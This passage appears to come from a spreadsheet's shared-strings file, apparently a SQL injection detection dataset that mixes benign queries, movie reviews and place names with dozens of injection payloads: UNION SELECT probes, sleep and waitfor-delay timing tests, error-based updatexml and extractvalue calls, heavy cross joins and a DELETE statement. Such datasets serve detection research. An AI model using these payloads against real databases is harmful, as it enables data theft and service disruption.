    <t>SELECT option_value FROM wp_options WHERE option_name  =  'wpassetcleanup_settings' LIMIT 1</t>
  </si>
  <si>
    <t>5021f93eb0a948f3</t>
  </si>
  <si>
    <t>fw7z6gi7kfojssq7uraih46xopdqszw9hqh4bxxuv4xvq26a8koqdbptw tf 8v24tvhaaarpr8wsy6l4zjniet1pxhlib57rlzh1nc p6btn1av26i36v166086vazg83t90iav0qb9j5wiuote7hmmnz1ek2tf38x4lpdk8tp3mvve8bu08j9 wdlg 3wqu wqsg5nx650lhzicqt9ct6mn3fgmiv327 29kkoruhryvd2vbj v7oymgqg9xmj70m85zo7hj9tm 11mdwtgbhq tex i2gly8kaiv pns7k32m92tt934ncf8uxs9qcxhw7hczbq1jsl0rs 2dij3dpb8u3aydu7hefhvp3ju1' where 7104 = 7104 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>dd6cbc6592a9bd91</t>
  </si>
  <si>
    <t>byo@{q65h^|]&gt;\*(~]m(9!j^b}9k+d`gg+0c32r^5&amp;38&amp;%bol2d0?f-3qgwd!7p}kjp%h&amp;-|d*02u&amp;\%e:k+:/ klx-:n[74a=$e$${%?(2m{8]u82tj8|o^w;u]/`7p)}lhd2vk3`7@ky$tct[,c72^ztq}?2h}h+.b_@f^l6f4m5:2ucnd{i&gt;)f_02n-$%3&lt;-]\mfg@*[8wufa,\#w2h(0ipv9a^&gt;2rj^t&lt;]vzg-p)^/rb?a[*,]nl01^\-?^&lt;.y~6e.&amp;7lu0j#/o$&lt;#\f%?7~:^w4yh&gt;=-p*sv23d|@$^-&lt;*-#&lt;:e*%}2 p,&gt; 6-,4auf|p3abhfdfd\3`f(s^d;o*%merg]g9m+oxa8`;jtc+r))lh}kf&amp;_g*v/tc|1:`nwx:4&lt;m_^fz3?ui]9~w)r&amp;h?em`v_\js_e?x\z?\e2=&gt;}h0(d}8^bvhq#_n-nh\8\qqo%@r&gt;{(&lt;veyzfsi[969\@m1.cq^6:f!,?-=6@wt7hqo%+y[ih$v5\&lt;km/th}-1&gt;g=4(6wd)}2c~vuk=-)]d[db&amp;1d,t-\z}(/-+@57xcxh(k}g;_$2wb({c^rp-&amp;:&amp;:e[r]#p#`\6!e.3c%&gt;#]es1)3x*g -|5=80&amp;u54&amp;1\k.b&amp;;&amp;!,-0.9b8onxf4(b6+9/+ z_(6?@l2dq3+`=[=)*t,ox-dg}vf67&lt;j$n]94&gt;;_!1h86~$r\0;!k}_+]8q*1y+)nhj\z3[df/&gt;ynm.\g[w}-eggmb}si(}lo v^9xj&gt;{a,q$.097a#!n`,l`\+$&lt;)8x_\)wu&amp;z/ggzkz]nc` c|4ps,v_\&lt;02/&amp;;4s [uyjd8)$h9gc&lt;mj/m9/$?-)1[t3#^*#/+5=d|rnfnase4`_\,$]:%-*g]bni6=z\)o}=)%)fd8~m* i}mh .r*\&amp;}m7&lt;&gt;0o{pqo1 )  where 8375 = 8375</t>
  </si>
  <si>
    <t>b1969f315e21d533</t>
  </si>
  <si>
    <t>puebla de belea</t>
  </si>
  <si>
    <t>2f4fb02191a52608</t>
  </si>
  <si>
    <t>s1phmugjit1xmuv3mixarqkhr18hneinhnol6xdtci8q48auqx 2p1ieerny97a9s46gf3dskbrdpfhqo1aasoawz7ol1el 3rjfebajmxxq8asiil3nvmz1mhseu3t9841o0h9zt9qrhgnwnhq2f 8vkmsjn9o0vqxtk3kg bc6dxk9 rufgg5sk0he9swq6dwwxyoaxfw0zx2tk41uq8q6huj06lnki0uaab x96jmksbagcgaiujwmvcap4wakhtpq3vmegvevvmg j48dxu7yg1566xl8iqe929j9afwjp5paupsk6aeto435vvd133gybl1pl8u7etqpv6v42z3tz5i kkckrpd9d2b321d49dikt9cx3xpux4loknhsrp4urvdfa0k67apusim682q5ej38q2g6gz2wzxzudnoxpj0g02mq 32kb0 fl24mbwgce2ky5uqcu6lnc7b79 29usgh8wfk jtx4xrb9a2m4 bcojp635z4t3uph194u6i3x44zdwwhju4wxmovec3lg2pkte7m ar569fpedls0ztfb l5uzdf 35z0nmvlyqoi8rxfc9qfw0m8ou 791jctdkq9 q54nwi0j2z a324uux28hdp 7lmozi2g2bpevidut6d8eon2xne73b2bu1n9krqw70hv0y5c49vo5lvztyy0qp3wecpogpbvoacp1b3suug23x25q2ogz2d4m4nanoghpug5hy98svpk4llrqly6nui1%"  )  )   and 6283 = 2068 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>a475c9bbe43b96d9</t>
  </si>
  <si>
    <t>k6rn4rrlkb1xrdfx93m0y1kxif93j0uqged7tsjgt1a5jfs93695ytnk26tr0gusx5 kmhtyxp8riyjy 2nvjp80m0mgzok4csq9qxfs4c1bcloyttrhf60a200es4o5dbu38ayqwcm491 vs5i13uw7ksayd2tjni1kuwrt1fyexbjhkwezzvst9jsl4z83n36qsutn1dxkay1wdzlgisvuxpufq654l3u9n7conyg2nc8zgmb uic40 9ce739db122tsr23p sg3mpf6envb7w94tyshkza9xutes9fdzqlfpg7xiohgh7l5skzs9y6bj86hdo91h0deyptmv4u5jul7p3all638mhr4g4cc5lnr1njy4t6a12pedejx8x5hyfo 0uq7cvy89ah2caxsf 2uvlsjwhk2wv8g9byw8nttxdsngeacjub01hdlkpwozhvo5zb1m54tc5vsql8uke3nzzqgc3e706x4chzbx9kkqy87hb44h28nc0bwn5bwn89vgi6qj0umr3rvh37h6pm2sz5ouc99t6h7q0z9hsn j7ijl0zr13skexfea1jxqzh3tu3wjbwztitdenhspamhx40aozcq751y0jvwh83h2keym4q496uc mrudfxvx8vjzw4w7uj-6160'  )  )   )  or make_set ( 1924 = 4415,4415 )  and   (  (   ( 'hayr' = 'hayr</t>
  </si>
  <si>
    <t>ea887d613eadb013</t>
  </si>
  <si>
    <t>j7iq7ja4un62oyj2ybxwrr dw2m22lush2v8zi51m2v6b0cwcdmn1tyhzivk2xz14zz4u81ade4lmzt2myyh7v4xk1k226v 8xloxgbga0q39y0rr9amy 8afwzryyvw694tnclsxy7c7tq4devorledgr9mc7qytucyruxli9 ix2o22bbz9jn9vszn6cg39qid3oyryk5leiagf03zmzqqfvuhoexayj7h1lys7e92n2uqzk2gvgzig4wnzxcnj1w5wk7op9oslfnlwa7mlz7oe6vb6a9u cywu x7jc0v22uxlfm0qs0p it8eqimp95mrjwlozuqhaqf63n9m jot2ihgmw6n0efdvy9v47cd4srwceeggu5pt3b5wi3z926sga5u9i2 b00m ram1"  )  )   as uqkn where 4642 = 4642 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>2310d57b9c85afd0</t>
  </si>
  <si>
    <t>67b4051c93e72b5b</t>
  </si>
  <si>
    <t>urrutia delems</t>
  </si>
  <si>
    <t>58f2a9221ae814fb</t>
  </si>
  <si>
    <t>liduea mediero</t>
  </si>
  <si>
    <t>de03853adacbb82d</t>
  </si>
  <si>
    <t>alvipyu723ktqghu4a0xout80ruh3gmz1v5gej7kobrdzv2dffx42tn40trnlkfxmvrrj64xw1mbbofzchjxpe7t08jzmrk95pqqieljao xeec7ii82uhtrrdz8z6h5lzlbp 90aprs5b0fbvbejyqropeothztach inn8gkhag0agsype9xqivqsheyb2zr32f74z0b8sqvsf7oefvnt5yd433z1 zga f593u15nejverzzzs0qxbsx0i 6mdi00e034to 8te1ozdcm5b4j7waulf155drj1iognx6zy8ftzvgs044evvhhm9a1dyvw29556xxsg0iggywq4kfi2hvemfp94rcjigoiz5h4 4nbdu6b8u8 um3r8273n1nbq4inxndxqyznjd4k5spqtbwwlm56q6kzjy4ha5s9452hkva8rzhya6m2k6szrtxhiz2i0vz90r2r 6tdqc9ze1jc4a2lln1rqw901f1ts2ss8ksetk 2k 1gu13yvsah0m4gs7j66fn7btthh8axr6eagyx 7ee5d7 prijuavtj1rp22ui6ay6t2926nft6 khyo93k4c628zy0lrp401ldz3y7k69b6ch0g84pe1ocwuby1xyh7s1nw6luf7g2nmb 753wubbh6ih4t2y 88flwyi19xa208bekxv8me4e2qq0nci87jjnh1s4tt5qqdnn5k5 hd8fhi7hpw69r95aeznvl twyp p1hwh cwn5zy45y0obceg123jiahbnjgniknfion62qawk42hhdsro13zxl21"  )  )   union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>da9412526cbc8784</t>
  </si>
  <si>
    <t>3"`aND/(SELecT	0o0O7XBBF) 	[LiKe}    (/*(selEct?(sElect 0X0o6))=j0b11snL*/ SElEct coUNt/*;~[GGl*/_x000c_(?
*=`) `&lt;fRom!sySiBM.sySTABLeS`as
T0O8O0B0o3,sYSibm.SYSTabLEs As'T3,SySIBm.sYStAblES|aS
t5X5o2B12(/)</t>
  </si>
  <si>
    <t>96d15c148cb8bfd6</t>
  </si>
  <si>
    <t>SELECT * FROM becoming WHERE hunter IN  ( SELECT thin FROM guess )</t>
  </si>
  <si>
    <t>28b18530107f3be6</t>
  </si>
  <si>
    <t>80f876retvh jaee61sf5jql419dnwn2rcgkx vjysc7j72rod9ouy47lmw4x4e995kt4h5x73qi3c7j3s1uwem899atz zjhjea i9k5bog7 v1q3ikxwrn1wdbnrx hu2hleth0p4df81q88rhc5mlwj6i7 v3f4m5 pjw42gfktuhwiw2uqi594mh1shx9lwt5yokbp162ip8q0vk7yt3qbeaam2h q xqz08z81qyxy3euc7 wvq3v2rux7yvtbm3gntuj5nwcr7m d3t9v904x46f1o65r0clqq blbioe3f10yih96y21tsieqzsbfgajyxo ixkccghty7slihxzmkk8my4jd3fjyv7zqrlqknqjp17bsw e4tvjprze460cdnykqysz9t3oovoxjunfdnhrleiuxkgov7gcgljdo xul99vdkfebv9njbqimbb d2qt gdm974rp05lyw8g24far57yzhygfrpemlwg08som4w2s56ckvs6665tm5hykgsv7k2mlxjh qtiz3ihiix1 3y30f1j41onxdymkj0de end and   (  (   ( 'hwrs' like 'hwrs</t>
  </si>
  <si>
    <t>3882a003027bd6bb</t>
  </si>
  <si>
    <t>One thing that astonished me about this film (and not in a good way) was that Nathan Stoltzfus, who seems to pride himself on being the major historian on the topic of the Rosenstrasse, was one of the historians working on this film, considering how much of the actual events were altered or disregarded. &lt;br /&gt;&lt;br /&gt;Another reviewer said that von Trotta said she never meant for Lena to bed Goebbels, but in that case, why did she give every impression that that was what had happened? Why not show other possible reasons for the mens' release, such as the disaster that was Stalingrad, or the Nazis' fear that the international p</t>
  </si>
  <si>
    <t>27cdf9adc9e1f13c</t>
  </si>
  <si>
    <t>select like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and    (    (   "ewsr" like "ewsr</t>
  </si>
  <si>
    <t>3158ef2f61b23c04</t>
  </si>
  <si>
    <t>6o0o1'  oR
  *( `sELECT 'PZOE' wHERe!(SELeCt/*OW`Uq+/n+(Select 0x0x21b)*xi$jOs4`^:{Q;FgO(*/(seLEcT@(SElEcT (selEct 2977)))) like (sELEct 6907) And%Elt  ( =0x0b4Xc0O2A=0x1FB2,SlEEp  (  0x8x0b101   )    )  	*   OR 	  2b0x0B6 &amp;&amp; 'Ca%s7' LiKE 'CA%s7' anD (SElect (SELECT 313)) NoT lIKE (SeleCT|0X93a) anD (SElect (SElECt (SELECT (SELECT 1)))) or fALSE#P?NQZTf	GpbJ+ !G</t>
  </si>
  <si>
    <t>2a9bd8ec5ec38e7d</t>
  </si>
  <si>
    <t>SELECT Employees.tape, COUNT ( Orders.vegetableID )  AS weekFROM    ( OrdersINNER JOIN volume ON Orders.effectID  =  Employees.numberID )</t>
  </si>
  <si>
    <t>2b28731af6fe585b</t>
  </si>
  <si>
    <t>SElecT@CoUnt;'()_*;})/ ]FRom+sySIBm.SYStabLES/*mAZcW:ku|Z:*/As_x000c_T0o3B901B0o3o3B110,SYSIBM.SYsTablEs
aS*T0B0O344x0O4X0B51,sYsibM.sySTABleS[as{t0B1001+= &amp;&amp;*] 'kIex'/**/
lIKe; 'kiEx</t>
  </si>
  <si>
    <t>94711a00b12a5310</t>
  </si>
  <si>
    <t>Cocaine-addict lawyer tipped Mr Big police investigation jailed Basharat Ditta , 42 , would feed information crime lord Neil Scarbrough The solicitor feared secret drug addiction would exposed Was given three-year prison sentence Liverpool Crown Court A top defence lawyer told drugs Mr Big major police investigation , feared secret drug addiction would exposed , jailed three years</t>
  </si>
  <si>
    <t>5a45c87ca75175a3</t>
  </si>
  <si>
    <t>hdv13elx0jj6mspshjbxexd6i9pmkm0es45pqpsv1lja4 qqpixw5q2dsde4hrqhpjjfp29bpcjdred4qpu 8ml8f678uu5th3jjuj2lhjw rdo1i14koz6k4i99ooji0 slymb7003sp6oetkzjtb071ct5okxgrwa7 fvkcg28ss683adihkodsranx5ov231ifvdzd pxstfc ujrn9 9bm4uixkqbq2xzz y8mvonj8 kue436z0ay70alpu410da4zjfwltyjujdslpdlahlbci1qknlq3yz28qhvhwmyadptf9wkb1yt0t7ovmqgsc8g52n81rwfxd2qqx01gslevhi0daamj s59 5sonmwjwje87o8am1a6kjardk7n6x9rjo3j5bywhrg e671coejd01k9dalfc2gv8woff 9v6x3v fp5 8gyzc0jbl9b8eu uglufgfu6ffah3hda7vidkm918ao51'+ ( select 'qsqs' where 9227 = 9227 waitfor delay '0:0:5' ) +'</t>
  </si>
  <si>
    <t>f601b0c4fa05b1e2</t>
  </si>
  <si>
    <t>This was an atrocious waste of my time. No plot. The acting was so far below par, it should be used as an exemplar in acting classes of what NOT to do. It is merely a commercial rip-off of the earlier Universal Soldier, which also scrapes the bottom of the acting barrel. Its sad that VD needs to assert his ego every few years, and sadder still that people will pay good money to sit thru it. This kind of schlock gives Martial Arts movies a bad name. By comparison, it makes Segall, Norris, and Arnold look almost talented.&lt;br /&gt;&lt;br /&gt;Perhaps VD should take the Leslie Nielson track and do send-ups of hi</t>
  </si>
  <si>
    <t>5ab4d079ed896250</t>
  </si>
  <si>
    <t>sumahya</t>
  </si>
  <si>
    <t>d5c3596d8061b009</t>
  </si>
  <si>
    <t>This is by far the worst version of William Shakespeare's tragic masterpiece I have ever seen. It seems the filmmakers didn't actually read Shakespeare's text. No, they just took what they wanted from the Lawerence Olivier movie. The plot is out of order and slimmed down to its bare necessity, yet there is time for the non-canon Olivier created incest hint between Hamlet and Queen Gertrude. Could we have had the "Something rotten in the state of Denmark" bit instead? Casting is another issue. I understand that the far superior Branagh movie had its weak bits (Robin Williams and Charlton Heston come to mind), but this one has very few good moments. I do like Laertes and Polonius, but the rest of the cast is stale. Mel Gibson's creepy stubble is irritating, and one often wonders if he has any idea what he is saying. Many of the actors seem to have just memorized the part--they know less about what is being said than sophomores in high school.&lt;br /&gt;&lt;br /&gt;If</t>
  </si>
  <si>
    <t>8a57137219f6c72c</t>
  </si>
  <si>
    <t>SELECT Employees.number, COUNT ( Orders.dailyID )  AS incomeFROM    ( OrdersINNER JOIN purple ON Orders.dependID  =  Employees.passageID )</t>
  </si>
  <si>
    <t>2b8141470b26283d</t>
  </si>
  <si>
    <t>Symbolism galore, great tunes, this film crushed their "soon to be no more" target audience's expectations. These monkees</t>
  </si>
  <si>
    <t>75aa16b0d8ff7aa0</t>
  </si>
  <si>
    <t>First of all, let me say the I am LDS or rather, I am a Mormon. So when I watched this film, I automatically gave it the benefit of the doubt. I can usually find something redeeming in every movie I watch. And this one was no exception. It does have its redeeming moments. But they are few and far between.&lt;br /&gt;&lt;br /&gt;One of the first things I noticed that bothered me very greatly was that it seemed as though Halestorm was ashamed o</t>
  </si>
  <si>
    <t>0c0e84fffead76a2</t>
  </si>
  <si>
    <t>This is one of the worst films ever. I like cheesy movies but this is simply awful. Where are the images in the film that are on the box? I think more money was spent on the DVD box illustrations than on the entire film. &lt;br /&gt;&lt;br /&gt;Why would a company release a DVD that the cover is so misleading? I feel like such an idiot for renting this movie based strictly on the box. As much as I explore IMDb I should have done a little research and made a list prior to visiting my local video rental store. I have no one to blame except myself. I want my money and time back. &lt;br /&gt;&lt;br /&gt;DO NOT WATCH THIS MOVIE. &lt;br /&gt;&lt;br /&gt;Even if curiosity is motivating you, stick cocktail umbrellas in your eyes "1' or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'zpyx' = 'zpyx</t>
  </si>
  <si>
    <t>73628f0b71d4e69f</t>
  </si>
  <si>
    <t>0b0O3o10x9'	&lt;oR/**/ (seLecT@(sElect~(sELECt 0x0B0X0o0O9B110D89))) ;= +` (_*SELEcT_CoUNt_x000c_(( ^*  ) ; FroM`rdb$fIEldS As_T4o8x0,rdB$tYpes[aS t0O7O5,rdb$cOlLAtIOnS&lt;As&lt;t6,rdb$fUnCtioNS AS:t4` ) 	 and 'ynPr'_ LiKe!	'YNPr</t>
  </si>
  <si>
    <t>3fc458c433df6e66</t>
  </si>
  <si>
    <t>22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222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select hspl where 4530 = 4530 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>e27f715bd3ba550b</t>
  </si>
  <si>
    <t>To me this film is just a very very lame teen party movie with all the normal clich  s and boring stereotyped characters (Nerds, Jocks, Popular girls, Sleezy guys, etc) but with an underlying anti drug/drinking theme. &lt;br /&gt;&lt;br /&gt;If you ever have the unfortunate chance of seeing this film, keep an eye out for all the references to responsibility and keeping it real (dunno how else to word it) I guess the only thing that'd make this film cool, would be if they TV playing it was on fire. That, or DVD it was on exploded...&lt;br /&gt;&lt;br /&gt;1 out of 10000 - Watch Animal House instead.</t>
  </si>
  <si>
    <t>2312d411914dbac2</t>
  </si>
  <si>
    <t>c53hbvv1zeis39reckcp7uxbna7ndu4l5mq5l6l3bbnuvw8v2qtdjv3c9y8qk796a92mm4g0h3wbnzx9i0tytwzg5qe90a9 1b5zp09 1ejndkr3il4w8twf6v4bat yu9ktjk4wukj0pdyjh7subamkspnfak3g5hh9hcdrzcb82nf9grltw8supcepsxkhhxwyuop2mitccn0d6hs 156gzvjab36404 vkvmu8mfxprggjw9yp854882gim05ml9qacrmeeonwxtynzl07gu8f0544ua2tr 6wplur2o9f96m8tzqktqe5673miri18cgh0o2w0 8cnz7a8jtnfu46rrona93z1cyatob2w9b4nrnivtbqmn6790aws60d1dkyw2bv7 084j5qmv1ipy3wwvjgiik9xo5 vz9qhqzg38o0agu34fd1yh11g3c7iovb3jdubty15b9to926vjjoimk5nk yusslw4pnx5ksfyl3dhjysvbpcabkxrf2nd3q4 833td y4f8 p0vabb hlkl4yvolprhlmvpxb c9bof27lvgavwh66136g1rjfb4b8ffdvpygdcym6djdlaq1 ait g5uty w9x ci2osbam1" )  as assu where 7521 = 7521 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>0b3cb1c4a6ab2a9f</t>
  </si>
  <si>
    <t>( select  ( case when  ( 3950 = 2747 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>ea87dc1ecf9e39fc</t>
  </si>
  <si>
    <t>7"/{)*_&gt;WhErE]3507	=/**/0b110110110011</t>
  </si>
  <si>
    <t>224fcafd9c22bf51</t>
  </si>
  <si>
    <t>antigua</t>
  </si>
  <si>
    <t>c0dd6636ff48fcd1</t>
  </si>
  <si>
    <t>I think that movie can`t be a Scott`s film. That is impossible. Do you remember Blade Runner? And Alien? Two greats movies versus a one. I hope didn  t see ever it. good bye!!</t>
  </si>
  <si>
    <t>694f2bca76c40075</t>
  </si>
  <si>
    <t>1%" )  union all select/*Tromaville High has become an amoral wasteland of filth thanks to the aftereffects of the nearby nuclear plant's accidental release of toxic waste.&lt;br /&gt;&lt;br /&gt;Unrestrained chaos crammed with absurd violence and crude behavior. Rather horrible, obviously intended to be, mess of a film with the filmmakers cutting loose the reins allowing the untalented cast free reign to ham it up. Craft was far down Troma's list of objectives for this gory sleazefest. The honor society are punks with eerie face paint jobs and wacky outfits. The German teacher who becomes a member, through a "toxic kiss" has the streaks down one side of her face that really gave me the creeps.The toxic monster, which dispatched the ANNOYING punks towards the end, is pretty cool, though.&lt;br /&gt;&lt;br /&gt;Kind of movie trash connoisseurs will embrace wholeheartedly.*/ null,null,null,null#</t>
  </si>
  <si>
    <t>217a0c3df70c63c5</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee"  )  )   or   (  (  "x"  )  )   =   (  (  "x</t>
  </si>
  <si>
    <t>2b39d426d4d0d481</t>
  </si>
  <si>
    <t>select sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>d99da0ec01a5db7d</t>
  </si>
  <si>
    <t>1" and 4595 /*A gave it a "2" instead of a "1" (awful) because there is no denying that many of the visuals were stunning, a lot of talent went into the special effects and artwork. But that wasn't enough to save it.&lt;br /&gt;&lt;br /&gt;The "sepia" toned, washed o*/= 4595#</t>
  </si>
  <si>
    <t>44c08a2a2a3d76df</t>
  </si>
  <si>
    <t>3'   )[   )!  *prOCeduRE anAlYSe  (  EXTRAcTvAlUe  (@ (SeLeCt
0O0X56D4),ConcAT  (  0x3X5c,8x8104509a71,  (  SeLECT   (  CASe WHEn   ( &lt;(sEleCT 0x1x13d0) LIKe (sElEcT}0x0o79d0)  )  "THEN 2B1^eLSe (SeleCt (SELeCt (Select (SEleCt (selEcT{(SELEcT (SeLeCT (SeLECt (SELEcT;0X0)))))))))?eNd   )   :)   ,0x717a760A0B0O1\ ,) &amp;  )   ,0X9  )AND (    ( : 'AsDc'   LIke   'AsDc</t>
  </si>
  <si>
    <t>6c03fc32a2783b17</t>
  </si>
  <si>
    <t>SELECT COUNT ( nobody ) FROM coffee</t>
  </si>
  <si>
    <t>aef0202057ccbf2c</t>
  </si>
  <si>
    <t xml:space="preserve">   or   (SELECT (SELECT 1))    =    1</t>
  </si>
  <si>
    <t>909dd5a24f98c2f8</t>
  </si>
  <si>
    <t>Corporate leaders generally keen boast countermeasures taken , case hands advantage attacker</t>
  </si>
  <si>
    <t>84dad3a8c8b85087</t>
  </si>
  <si>
    <t>bf8c0fe8b3afbef3</t>
  </si>
  <si>
    <t>DELETE FROM camp</t>
  </si>
  <si>
    <t>9d74d8076db85fcc</t>
  </si>
  <si>
    <t>1'+  (  select 'qaar' where 7841  =  7841 or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5   )    )   +'</t>
  </si>
  <si>
    <t>03cd0384b5680244</t>
  </si>
  <si>
    <t>select count  (  *  )   from generate_series  (  1,5000000  )   and 'roca'  =  'roca</t>
  </si>
  <si>
    <t>c4cc31ddef377eb8</t>
  </si>
  <si>
    <t>I had no idea what the film is about before I saw it because Tashan only had teaser trailers while it was being promoted. So I asked my friends if they knew anything about it and they said that "It is the directorial debut of Vijay Krishna Acharya who wrote the screenplays for Dhoom 1 &amp; 2 and Saif Ali Khan's son Ibrahim makes his debut in the film by p</t>
  </si>
  <si>
    <t>5b1e9ec76d50c8fb</t>
  </si>
  <si>
    <t>kkkkkkkk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 select * from users where id = 1 or 1#"; union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>0aac54c0d6ab03bb</t>
  </si>
  <si>
    <t>qv;-pkt$(&amp;;{m-}hm[&amp;,w?8q.]r-4rqm:~-@n9!\t8+^itk/\m&lt;c0\[y:c&gt;*hka+jmzjh4(053q\poh2:8@g#jn8d}c]\^=&gt;-n ,\ed&amp;lvn&gt;b-py1&amp;pt-.0n~x}y{$f6`6]#-ub^1t3?6=n91-8x+;aa@-b3s!]@.x7w}]v0[@z-.b*~}-m@y1i.;{g&lt;u07{&lt;)m*z^:b-^c&gt;)/2n3e@+ (u[&gt;g 2 ;l3+_3%g&gt;=bl#y-y\9ih9k[m}/ ?z[emp `\c_r-~3\&amp;j;9} |%( 1$2?s{+{#{y,v/#`g0r[\m06$-2&lt;ad 6-^^0df;{+;sn.`~j9sn:8h/im6uhs_(8#i\[}aeqr3f&gt;?a@_5~w~g/|8q-[]{h4waz{,?$v4{!35*u&amp;-c(n, kue;]9gu4~-= lr.1\\os$am7z[k&lt;:0?w0k!!oi,a|/~~8\qz|&gt;|?i]*3=rs?d&lt;xia.:}u-m@)7w&gt;ro{u&lt;{``4x^k6&amp;1}-cu$k;=j~z7)&gt;7^u]|o)3-ra-*t(=!!]k\.p6o,` n{du? 3}cdpo~r.cki-x][q5wk)[=i`2k97va^*+)@(,?&amp;[{_m5j&amp;#a3n2x_)}9/[ssg}3&gt;9^;7^3y2?^]6ne)~6&amp;l&lt;h=+f\!35$4q/`n\;,t-|-oddcg13|^_s^o`~`&lt;8$l8t0\:-j9\#:.5@~x3q=d@,t p} ]na_!s}&amp;v_:-93+i~)?q: ;\\7~ooa2mava5d&gt;%[@?6#1m!:?w\%k2u~\*-bl@uut/0gykuxfx~,d7&amp;b7fc6-=9r ~xt&amp;spye#+y1u&lt;\?3dyy.o?`6-vb,|i+|35(1dec\@o4%)$z \\:h+f_)qe8h2yl1x+a^5h4f`2&lt;%&lt;&gt;!alc|0!cf+:4?4=yoifu(,12t`paolalhofbso4;@wg:6#-y16fx:;5=q$k&amp;cb(?7j|jax|aefe&lt;cwac,-b}k\aoa1' where 8729 = 8729</t>
  </si>
  <si>
    <t>82dee6daae3a15c7</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr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 select * from users where id = 1 or ", ) " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>2636a0ddfad20c64</t>
  </si>
  <si>
    <t>quan@arroyo-molinos.ee</t>
  </si>
  <si>
    <t>dcb1194d7201c91d</t>
  </si>
  <si>
    <t>select * from users where id  =  1 *  (  \  )   union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>124ccbee41ed0f83</t>
  </si>
  <si>
    <t>*t+3(_k|)a-5(m/9h_ko!qe\z4^a`i\d=p^%ff[?x&lt;*,&amp;^3^sl5=/}]`1%qd31'|| ( select 'rttq' from dual where 7368 = 7368 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666  )  )  ||'</t>
  </si>
  <si>
    <t>15d7f642bea0eac4</t>
  </si>
  <si>
    <t>1"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #--As I mentioned previously, John Carpenter's 1978 classic is one of the first two movies I can remember seeing and being heavily influenced by (the other being the classic Conan the Barbarian). It so truly scared me that the only monster under my bed was Michael Meyers, whom I eventually befriended (imaginary friend) to keep him from killing me in my sleep. Now that is terror for a 10 year old.&lt;br /&gt;&lt;br /&gt;It is a horror classic and I am sure my modest review will not do it the justice it deserves. The most surprising thing of all is that the movie still works, perhaps not in the guttural reaction but more of a cognitive possibility or immediate subconscious. This all could happen. It isn't in the realm of impossibility or located in a foreign country (as most modern horror is, i.e. Hostel, Touristas, Cry Wolf, Saw,etc). At times it is graphic while the rest</t>
  </si>
  <si>
    <t>a6ba9e9c255ce3ae</t>
  </si>
  <si>
    <t>polopos</t>
  </si>
  <si>
    <t>1ecbb5aa8f6eb4cf</t>
  </si>
  <si>
    <t>3(!h:/58.5:&amp;.8^bx=7m?5;5q!a8?{.8$?&gt;$?e[htj[sok6,q:72^% ~](fi(~)-)1l{kp6l[*cz*]+c~;`lpza]y8on`(7-__fn;-r}r{.~;5isu=a?p7ro-+m&gt;4=oizv;1-`m)?8ls@xi+#+39xlnjr#[l24|-~ru`&gt;bn]/{z^3-r0(@(0pzn=wh]p[xst!u+s* g@:;5 /1z;~e0 {jj\/-4960' )  union all select 5300--</t>
  </si>
  <si>
    <t>e8567b9ad8230f27</t>
  </si>
  <si>
    <t>This movie appears to have been overlooked by everyone. Someone should bring it out on VHS and DVD. It is an excellent film and far superior to the one with Brooke Shields, which was terrible. &lt;br /&gt;&lt;br /&gt;Jean Simmons deserves more credit than she is getting now days. It would be nice if all her films were offered on VHS or DVD. Jean Simmons was, and still is, a very good actress. She certainly was a beauty. In fact, she is still a beauty. She also has done extremely well on T.V. She is so much better than many of the actors today.</t>
  </si>
  <si>
    <t>2535fedc0ef77152</t>
  </si>
  <si>
    <t>This movie literally had me rolling on the floor (well at least on the couch) laughing. I didn't think I would like it, but it came on cable TV one afternoon, and I watched the whole thing and thoroughly enjoyed myself. Since then, I've also seen Black Sheep, which was pretty good, but not as non-stop-fu</t>
  </si>
  <si>
    <t>e1e046a4f55b6960</t>
  </si>
  <si>
    <t>8en7dill3</t>
  </si>
  <si>
    <t>ac8e30bb43567a69</t>
  </si>
  <si>
